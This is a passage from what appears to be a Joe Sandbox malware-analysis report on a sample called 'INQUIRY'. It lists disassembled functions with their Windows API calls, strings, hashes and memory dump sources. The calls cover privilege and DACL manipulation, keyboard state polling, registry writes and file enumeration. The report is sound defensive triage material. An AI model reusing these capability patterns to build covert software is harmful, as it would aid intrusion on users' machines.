                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00A4D748
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 4125248594-2988720461
                                                                                              • Opcode ID: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
                                                                                              • Instruction ID: 40f9481ed286a8e266049b0eafe259a9de5475df33d068110a7bdff49d217666
                                                                                              • Opcode Fuzzy Hash: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
                                                                                              • Instruction Fuzzy Hash: F3315575B403187FEB205BA19C49F7F7E6CEB44B50F114026FA05EA1D1CAB05951AAA1
                                                                                              Function 00A68310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
                                                                                                • Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
                                                                                                • Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865
                                                                                              • _memset.LIBCMT ref: 00A68353
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A683A5
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A683B6
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A683CD
                                                                                              • GetProcessWindowStation.USER32 ref: 00A683E6
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 00A683F0
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A6840A
                                                                                                • Part of subcall function 00A681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
                                                                                                • Part of subcall function 00A681CB: CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 2063423040-1027155976
                                                                                              • Opcode ID: 453b67758c6a66478b58ea06f4d94b4528027eb614916cd54863181a8ac3eefa
                                                                                              • Instruction ID: 0c47181164a22bad72af8810a3a48c4454a7f89e6926b00fa6b11351df753422
                                                                                              • Opcode Fuzzy Hash: 453b67758c6a66478b58ea06f4d94b4528027eb614916cd54863181a8ac3eefa
                                                                                              • Instruction Fuzzy Hash: 61816B71900249AFDF11DFA4CD49AEEBBBCFF04304F14426AF915A62A1DB398E15DB20
                                                                                              Function 00A7C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A7C78D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7C7E1
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C806
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C81D
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A7C844
                                                                                              • __swprintf.LIBCMT ref: 00A7C890
                                                                                              • __swprintf.LIBCMT ref: 00A7C8D3
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • __swprintf.LIBCMT ref: 00A7C927
                                                                                                • Part of subcall function 00A33698: __woutput_l.LIBCMT ref: 00A336F1
                                                                                              • __swprintf.LIBCMT ref: 00A7C975
                                                                                                • Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A33713
                                                                                                • Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A3372B
                                                                                              • __swprintf.LIBCMT ref: 00A7C9C4
                                                                                              • __swprintf.LIBCMT ref: 00A7CA13
                                                                                              • __swprintf.LIBCMT ref: 00A7CA62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 3953360268-2428617273
                                                                                              • Opcode ID: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
                                                                                              • Instruction ID: ac8934d7c78dc8ab1e09ac95fc68cc66c1a87edf1d0673b097ea71ea19661054
                                                                                              • Opcode Fuzzy Hash: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
                                                                                              • Instruction Fuzzy Hash: 45A11BB2508204ABC710EFA4C996DEFB7ECBF98700F40491EF595C6191EB34DA49CB62
                                                                                              Function 00A7EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A7EFB6
                                                                                              • _wcscmp.LIBCMT ref: 00A7EFCB
                                                                                              • _wcscmp.LIBCMT ref: 00A7EFE2
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A7EFF4
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00A7F00E
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A7F026
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F031
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F04D
                                                                                              • _wcscmp.LIBCMT ref: 00A7F074
                                                                                              • _wcscmp.LIBCMT ref: 00A7F08B
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F09D
                                                                                              • SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F0BB
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F0C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F0D2
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F0E4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1803514871-438819550
                                                                                              • Opcode ID: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
                                                                                              • Instruction ID: 4553ada9903c32119d5d8be0913791287cd654b85b967a36e5de08e8db18997f
                                                                                              • Opcode Fuzzy Hash: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
                                                                                              • Instruction Fuzzy Hash: D73180326012197EDF14DBB4EC49AEE77ACAF48360F148176E818D3191EB74DB46CA61
                                                                                              Function 00A90857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A90953
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A9F910,00000000,?,00000000,?,?), ref: 00A909C1
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A90A09
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A90A92
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A90DB2
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A90DBF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 536824911-966354055
                                                                                              • Opcode ID: e08cc3061b9eae5733d6697267673fce5cd15573410487be7a218fa541c8d46b
                                                                                              • Instruction ID: 77337c2280024e4d92c9eadad9dde14ead04a3bd320ab7273f8a856b56994f20
                                                                                              • Opcode Fuzzy Hash: e08cc3061b9eae5733d6697267673fce5cd15573410487be7a218fa541c8d46b
                                                                                              • Instruction Fuzzy Hash: D90269756006119FCB14EF28C991E6AB7E9FF89314F04885DF89A9B362DB30ED41CB81
                                                                                              Function 00A7F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A7F113
                                                                                              • _wcscmp.LIBCMT ref: 00A7F128
                                                                                              • _wcscmp.LIBCMT ref: 00A7F13F
                                                                                                • Part of subcall function 00A74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A743A0
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A7F16E
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F179
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F195
                                                                                              • _wcscmp.LIBCMT ref: 00A7F1BC
                                                                                              • _wcscmp.LIBCMT ref: 00A7F1D3
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F1E5
                                                                                              • SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F203
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F20D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F21A
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F22C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1824444939-438819550
                                                                                              • Opcode ID: d58b384054258de3b6d21002f3c77cd5245aceba7949f45b6d650b331e8bae4b
                                                                                              • Instruction ID: 8f1f6e521ca3f6f1ee1e17697383d961339496fff1be07cca3b658aa5c35426f
                                                                                              • Opcode Fuzzy Hash: d58b384054258de3b6d21002f3c77cd5245aceba7949f45b6d650b331e8bae4b
                                                                                              • Instruction Fuzzy Hash: 1931A436600219BEDF10DBB4EC49EEE77ACAF45360F148176E918E2091DB30DF45CA94
                                                                                              Function 00A7A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A7A20F
                                                                                              • __swprintf.LIBCMT ref: 00A7A231
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A7A26E
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A7A293
                                                                                              • _memset.LIBCMT ref: 00A7A2B2
                                                                                              • _wcsncpy.LIBCMT ref: 00A7A2EE
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A7A323
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7A32E
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00A7A337
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7A341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 2733774712-3457252023
                                                                                              • Opcode ID: a7c97f28da76fdcec3c17983e7c5702bfa285e5799ecff2518b7f847f67740b5
                                                                                              • Instruction ID: db4653ea6d81fd74c2b6a9697e4cb72558491b9783380961213c79f98d8c2391
                                                                                              • Opcode Fuzzy Hash: a7c97f28da76fdcec3c17983e7c5702bfa285e5799ecff2518b7f847f67740b5
                                                                                              • Instruction Fuzzy Hash: D731AEB5A04109BBDB20DFA0DC49FEF37BCAF88740F1081B6F508D6161EB7496458B65
                                                                                              Function 00A67CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
                                                                                                • Part of subcall function 00A68202: GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
                                                                                                • Part of subcall function 00A68202: GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
                                                                                                • Part of subcall function 00A68202: HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
                                                                                                • Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255
                                                                                                • Part of subcall function 00A6829F: GetProcessHeap.KERNEL32(00000008,00A67CF8,00000000,00000000,?,00A67CF8,?), ref: 00A682AB
                                                                                                • Part of subcall function 00A6829F: HeapAlloc.KERNEL32(00000000,?,00A67CF8,?), ref: 00A682B2
                                                                                                • Part of subcall function 00A6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A67CF8,?), ref: 00A682C3
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A67D13
                                                                                              • _memset.LIBCMT ref: 00A67D28
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A67D47
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A67D58
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00A67D95
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A67DB1
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A67DCE
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A67DDD
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A67DE4
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A67E05
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00A67E0C
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A67E3D
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A67E63
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A67E77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: 5a9c3e78912b8cac5252c5dbc1394f3a2db790dc736b9b6d9439b4b381d43003
                                                                                              • Instruction ID: 8c36c38d8733abf7f9f6f6410a47140e426bc05ef28aa44767f41b81c342e522
                                                                                              • Opcode Fuzzy Hash: 5a9c3e78912b8cac5252c5dbc1394f3a2db790dc736b9b6d9439b4b381d43003
                                                                                              • Instruction Fuzzy Hash: 06613B71A04209EFDF00DFA5DC45AEEBB79FF04304F14826AF915E6291EB359A16CB60
                                                                                              Function 00A266E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                              • API String ID: 0-4052911093
                                                                                              • Opcode ID: 6b534a7ff1b045f59cd68c22be8ae8c90fa68991592be3c688a9d6da085ae955
                                                                                              • Instruction ID: 7598ebe3a42508349da24ebecc82fff9353d48402a0fa4ab167d8b6d0c785142
                                                                                              • Opcode Fuzzy Hash: 6b534a7ff1b045f59cd68c22be8ae8c90fa68991592be3c688a9d6da085ae955
                                                                                              • Instruction Fuzzy Hash: E8727175E01229DBDF14DF59D8807AEBBB5FF48710F14816AE806EB291EB349D81CB90
                                                                                              Function 00A7001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00A70097
                                                                                              • SetKeyboardState.USER32(?), ref: 00A70102
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00A70122
                                                                                              • GetKeyState.USER32(000000A0), ref: 00A70139
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00A70168
                                                                                              • GetKeyState.USER32(000000A1), ref: 00A70179
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00A701A5
                                                                                              • GetKeyState.USER32(00000011), ref: 00A701B3
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00A701DC
                                                                                              • GetKeyState.USER32(00000012), ref: 00A701EA
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00A70213
                                                                                              • GetKeyState.USER32(0000005B), ref: 00A70221
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 70336cfb3a407afdabc4786cd4559816202ec3309fc0ea262d9f44bd6b65e3e6
                                                                                              • Instruction ID: 757473c070e60cd2d57e88ef872bd69988c5e0f40f2fdd453f3132c2c0539356
                                                                                              • Opcode Fuzzy Hash: 70336cfb3a407afdabc4786cd4559816202ec3309fc0ea262d9f44bd6b65e3e6
                                                                                              • Instruction Fuzzy Hash: A951FC20A0478899FB35DBB08D14FEABFB49F11380F48C59ED5CA565C3DAA49B8CC761
                                                                                              Function 00A903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A904AC
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A9054B
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A905E3
                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A90822
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A9082F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1240663315-0
                                                                                              • Opcode ID: beaa33014c8d211cd6fc97bf1bb2661ae717bd5d99e0e90b3d7bbcc1ec47cc61
                                                                                              • Instruction ID: e39b736a313cfdbbf4f55331d341a2049620a79f88ec93f9ca4e7ac128dc885a
                                                                                              • Opcode Fuzzy Hash: beaa33014c8d211cd6fc97bf1bb2661ae717bd5d99e0e90b3d7bbcc1ec47cc61
                                                                                              • Instruction Fuzzy Hash: 4AE14C31604210AFCB14DF68C995E6ABBF9EF89354F04896DF84ADB261DB30E941CB91
                                                                                              Function 00A883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • CoInitialize.OLE32 ref: 00A88403
                                                                                              • CoUninitialize.OLE32 ref: 00A8840E
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00AA2BEC,?), ref: 00A8846E
                                                                                              • IIDFromString.OLE32(?,?), ref: 00A884E1
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A8857B
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A885DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
